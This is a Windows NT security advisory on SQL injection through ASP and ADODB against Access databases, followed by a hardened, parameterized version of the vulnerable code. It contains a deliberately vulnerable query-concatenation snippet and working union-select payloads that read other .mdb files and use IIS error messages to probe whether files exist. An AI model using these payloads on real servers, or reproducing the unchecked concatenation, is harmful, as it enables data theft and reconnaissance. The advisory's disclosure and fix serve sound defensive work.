COMMAND
SQL
SYSTEMS AFFECTED
WinNT
PROBLEM
Jess Lopez de Aguileta found the following. It was tested on:
- WinNT Spanish SP5
- Data Access 2.1
- Option Pack 4
The following SQL works in an ADODB connection inside ASP:
select field1,field2 from table_DSN_DB where field1=21 union select address,path from \winnt\profiles\administrador\escritorio\report.mdb.scanner
The first statement (to the left of 'union') is the valid
query. A DSN exists and points to the DB containing the table
"table_DSN_DB". The second, appended query has no DSN pointing
to it; it names the .mdb file by its path. For this example you
may use a Retina scanner report. Obviously IUSR_Server must have
ACL authorization to the file "report.mdb" for this to work.
Now think of typical code like this:
set conect_to = Server.CreateObject("ADODB.Connection")
conect_to.open "validDSN"
' Vulnerable: the form value is concatenated into the SQL text unchecked
SQLQuery = "select family,description from table where family=" & _
    request.form("family_of_item")
set lot_of_registers=conect_to.execute (SQLQuery)
do while not lot_of_registers.EOF
    response.write( lot_of_registers.fields("family"))
    response.write( lot_of_registers.fields("description"))
    lot_of_registers.movenext
loop
It would be easy to tweak this query to access any database on the
NT box. The standard error report from IIS allows you to tune
your query.
But there is more: you can check for the installation of vulnerable
programs/scripts. If the file exists:
select family,description from table where family=21 union select * from \autoexec.bat.mdb
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\AUTOEXEC.BAT'.
If it does not exist:
select family,description from table where family=21 union select * from \other_autoexec.bat.mdb
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\other_autoexec.bat'.
SOLUTION
- Check the ACLs on all your Access databases on the NT box.
- Check ALL the input from any form that could be used to
construct a SQL query.
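
The second point applied to the ASP snippet above, as an added example that is not part of the original advisory: the form value is validated as digits and passed as a typed ADO parameter, and driver errors are not echoed to the client. The DSN, table and field names are the advisory's own placeholders; the helper IsDigits and the assumption that family is a numeric column (as in the family=21 queries) are introduced here.

```vbscript
' Added example: hardened form of the advisory's ASP snippet.
' ADO constants, values as in adovbs.inc (omit if that file is included).
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

' Hypothetical helper: True only for 1 to 9 decimal digits (fits in a Long).
Function IsDigits(s)
    Dim i
    IsDigits = (Len(s) >= 1 And Len(s) <= 9)
    For i = 1 To Len(s)
        If InStr("0123456789", Mid(s, i, 1)) = 0 Then IsDigits = False
    Next
End Function

Dim raw, conect_to, cmd, lot_of_registers
raw = Trim(Request.Form("family_of_item"))

' Reject anything that is not a plain number before touching the database.
' IsNumeric alone is too loose here: it also accepts "1e3" and "&H10".
If Not IsDigits(raw) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conect_to = Server.CreateObject("ADODB.Connection")
conect_to.Open "validDSN"

' The value travels as a typed parameter, never as part of the SQL text,
' so an appended "union select ..." is not parsed as SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conect_to
cmd.CommandType = adCmdText
cmd.CommandText = "select family,description from table where family=?"
cmd.Parameters.Append cmd.CreateParameter("family", adInteger, adParamInput, , CLng(raw))

' Keep the driver's message away from the client: the advisory shows
' how those messages reveal whether a file exists.
On Error Resume Next
Set lot_of_registers = cmd.Execute
If Err.Number <> 0 Then
    Response.Status = "500 Internal Server Error"
    Response.End
End If
On Error GoTo 0
Do While Not lot_of_registers.EOF
    Response.Write lot_of_registers.Fields("family")
    Response.Write lot_of_registers.Fields("description")
    lot_of_registers.MoveNext
Loop
```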